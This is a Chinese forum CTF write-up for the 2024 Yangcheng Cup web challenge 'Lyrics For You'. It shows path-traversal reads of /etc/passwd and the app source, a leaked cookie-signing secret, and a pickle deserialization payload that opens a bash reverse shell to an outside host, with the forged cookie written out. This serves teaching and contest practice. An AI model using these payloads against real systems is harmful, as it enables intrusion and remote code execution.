【2024羊城杯】初赛WEB-Lyrics For You解题分享

张春 · 2024-10-11 03:02:08

【2024羊城杯】初赛WEB-Lyrics For You解题分享

开端分析，获取源码

靶机开启后只显示一个页面，页面有三个超链接，打开后url为https://ip:port/lyrics?lyrics=Rain.txt,开端推测为路径拼接文件读取，返回文件内容。
使用lyrics=/…/…/…/…/…/…/…/etc/passwd发现读取服务器用户信息成功，
改为lyrics=/…/…/…/…/…/…/…/proc/self/cmdline读取当前进程完备命令，
显示python -u /usr/etc/app/app.py，
访问lyrics=/…/…/…/…/…/…/…/usr/etc/app/app.py读取源码

app.py
1. import os
2. import random
3. from flask import Flask, make_response, request, render_template
4. from config.secret_key import secret_code
5. from cookie import set_cookie, cookie_check, get_cookie
6. import pickle
8. app = Flask(__name__)
10. # 设置Flask应用的密钥，用于会话加密
11. app.secret_key = random.randbytes(16)
13. class UserData:
14. """用户数据类，存储用户名"""
16. def __init__(self, username):
17. self.username = username
19. def Waf(data):
20. """
21. Web应用防火墙函数，检查数据中是否包含黑名单中的敏感词汇
22. :param data: 待检测的数据
23. :return: 如果数据中包含敏感词则返回True，否则返回False
24. """
25. blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
26. valid = False
27. for word in blacklist:
28. if word.lower() in data.lower():
29. valid = True
30. break
31. return valid
33. @app.route("/", methods=['GET'])
34. def index():
35. """
36. 处理首页请求，渲染index.html模板
37. :return: 渲染的HTML页面
38. """
39. return render_template('index.html')
41. @app.route("/lyrics", methods=['GET'])
42. def lyrics():
43. """
44. 处理歌词请求，根据请求参数返回指定歌词文件的内容
45. :return: 歌词文件内容或错误消息
46. """
47. resp = make_response()
48. resp.headers["Content-Type"] = 'text/plain; charset=UTF-8'
50. query = request.args.get("lyrics")
51. path = os.path.join(os.getcwd() + "/lyrics", query)
53. try:
54. with open(path) as f:
55. res = f.read()
56. except Exception as e:
57. return "No lyrics found"
59. return res
61. @app.route("/login", methods=['POST', 'GET'])
62. def login():
63. """
64. 处理用户登录请求，如果是POST请求则设置用户cookie
65. :return: 登录页面或设置cookie后的响应
66. """
67. if request.method == 'POST':
68. username = request.form["username"]
69. user = UserData(username)
70. res = {"username": user.username}
71. return set_cookie("user", res, secret=secret_code)
73. return render_template('login.html')
75. @app.route("/board", methods=['GET'])
76. def board():
77. """
78. 处理留言板请求，根据用户cookie显示不同的页面
79. :return: 渲染的用户或管理员页面
80. """
81. invalid = cookie_check("user", secret=secret_code)
83. if invalid:
84. return "Nope, invalid code get out!"
86. data = get_cookie("user", secret=secret_code)
88. if isinstance(data, bytes):
89. a = pickle.loads(data)
90. data = str(data, encoding="utf-8")
92. if "username" not in data:
93. return render_template('user.html', name="guest")
95. if data["username"] == "admin":
96. return render_template('admin.html', name=data["username"])
98. if data["username"] != "admin":
99. return render_template('user.html', name=data["username"])
101. if __name__ == "__main__":
102. # 设置工作目录为当前文件所在的目录
103. os.chdir(os.path.dirname(__file__))
104. # 运行Flask应用
105. app.run(host="0.0.0.0", port=8080)
复制代码

跟据import内容
读取cookie.py和secret_key

cookie.py
1. import base64
2. import hashlib
3. import hmac
4. import pickle
5. from flask import make_response, request
7. # Compatibility layer for Python 3
8. unicode = str
9. basestring = str
10. secret_code = "EnjoyThePlayTime123456"
11. data=
12. def cookie_encode(data, key):
13. msg = base64.b64encode(pickle.dumps(data, -1))
14. sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
15. return tob('!') + sig + tob('?') + msg
17. def cookie_decode(data, key):
18. data = tob(data)
19. if cookie_is_encoded(data):
20. sig, msg = data.split(tob('?'), 1)
21. if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
22. return pickle.loads(base64.b64decode(msg))
23. return None
25. def waf(data):
26. blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
27. valid = False
28. for word in blacklist:
29. if word in data:
30. valid = True
31. break
32. return valid
34. def cookie_check(key, secret=None):
35. a = request.cookies.get(key)
36. data = tob(request.cookies.get(key))
37. if data:
38. if cookie_is_encoded(data):
39. sig, msg = data.split(tob('?'), 1)
40. if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(secret), msg, digestmod=hashlib.md5).digest())):
41. res = base64.b64decode(msg)
42. if waf(res):
43. return True
44. else:
45. return False
46. return True
47. else:
48. return False
50. def tob(s, enc='utf8'):
51. return s.encode(enc) if isinstance(s, unicode) else bytes(s)
53. def get_cookie(key, default=None, secret=None):
54. value = request.cookies.get(key)
55. if secret and value:
56. dec = cookie_decode(value, secret)
57. return dec[1] if dec and dec[0] == key else default
58. return value or default
60. def cookie_is_encoded(data):
61. return bool(data.startswith(tob('!')) and tob('?') in data)
63. def _lscmp(a, b):
64. return not sum(0 if x == y else 1 for x, y in zip(a, b)) and len(a) == len(b)
66. def set_cookie(name, value, secret=None, **options):
67. if secret:
68. value = touni(cookie_encode((name, value), secret))
69. resp = make_response("success")
70. resp.set_cookie("user", value, max_age=3600)
71. return resp
72. elif not isinstance(value, basestring):
73. raise TypeError('Secret key missing for non-string Cookie.')
74. if len(value) > 4096:
75. raise ValueError('Cookie value too long.')
77. def touni(s, enc='utf8', err='strict'):
78. return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)
复制代码
secret_key
secret_code = "EnjoyThePlayTime123456"

源码分析

app.py

def Waf(data):
"""
Web应用防火墙函数，检查数据中是否包含黑名单中的敏感词汇
:param data: 待检测的数据
:return: 如果数据中包含敏感词则返回True，否则返回False
"""
blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
valid = False
for word in blacklist:
if word.lower() in data.lower():
valid = True
break
return valid

复制代码

app.py莫名有个waf在这，肯定不是白放的

@app.route("/board", methods=['GET'])
def board():
"""
处理留言板请求，根据用户cookie显示不同的页面
:return: 渲染的用户或管理员页面
"""
invalid = cookie_check("user", secret=secret_code)
if invalid:
return "Nope, invalid code get out!"
data = get_cookie("user", secret=secret_code)
if isinstance(data, bytes):
a = pickle.loads(data) #**这里有pickle反序列化漏洞**
data = str(data, encoding="utf-8")
if "username" not in data:
return render_template('user.html', name="guest")
if data["username"] == "admin":
return render_template('admin.html', name=data["username"])
if data["username"] != "admin":
return render_template('user.html', name=data["username"])
if __name__ == "__main__":
# 设置工作目录为当前文件所在的目录
os.chdir(os.path.dirname(__file__))
# 运行Flask应用
app.run(host="0.0.0.0", port=8080)

复制代码

接下来只要通过伪造session传递数据到pickle.loads(data)，然后使用系统命令执行反弹shell

(S'bash -c "bash -i >& /dev/tcp/ip/4000 0>&1"'
ios
system
.

复制代码

cookie.py

直接调用cookie_encode函数

data=('user',b'''(S'bash -c "bash -i >& /dev/tcp/ip/4000 0>&1"'
ios
system
.
''')print(cookie_encode(data, secret_code))

复制代码

user=!fzBR6MTlPIgw1wjf8B3CXw==?gAWVSAAAAAAAAACMBHVzZXKUQzsoUydiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwL2lwLzQwMDAgMD4mMSInCmlvcwpzeXN0ZW0KLpSGlC4=
反弹shell

先访问/login，之后访问/board，
使用Burpsuite拦截，修改cookie为须要的内容
当地监听4000端口，反弹shell成功
开端尝试读取flag
cat /flag显示没有权限，提权也还没学会
ls后，发现根目录有/readflag文件
直接运行得到flag
总结

和去年的2023羊城杯的Serpent很像，思路也差不多，只是细节上不太一样，但是新人菜鸡做了快一天，这一天学的比一暑假都多（还被队友骂了
叠甲：新人CTFer第一次做这么复杂的标题，如果有错误麻烦各位师傅指出来，本身查到的相关资料放在最后了，感谢看到这里Ciallo～(∠・ω< )⌒☆
扩展链接：

2023年“羊城杯”网络安全大赛 Web方向题解wp 全_羊城杯2023wp-CSDN博客
羊城杯 2023 Writeup - 星盟安全团队 (xmcve.com)
pickle反序列化初探 - 先知社区 (aliyun.com)
pickle反序列化漏洞根本知识与绕过简析 - 先知社区 (aliyun.com)
Linux各目录及每个目录的详细先容 - lin_zone - 博客园 (cnblogs.com)

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

		自动登录	找回密码
密码			立即注册

【2024羊城杯】初赛WEB-Lyrics For You解题分享

0 个回复

快速回复

楼主热帖

标签云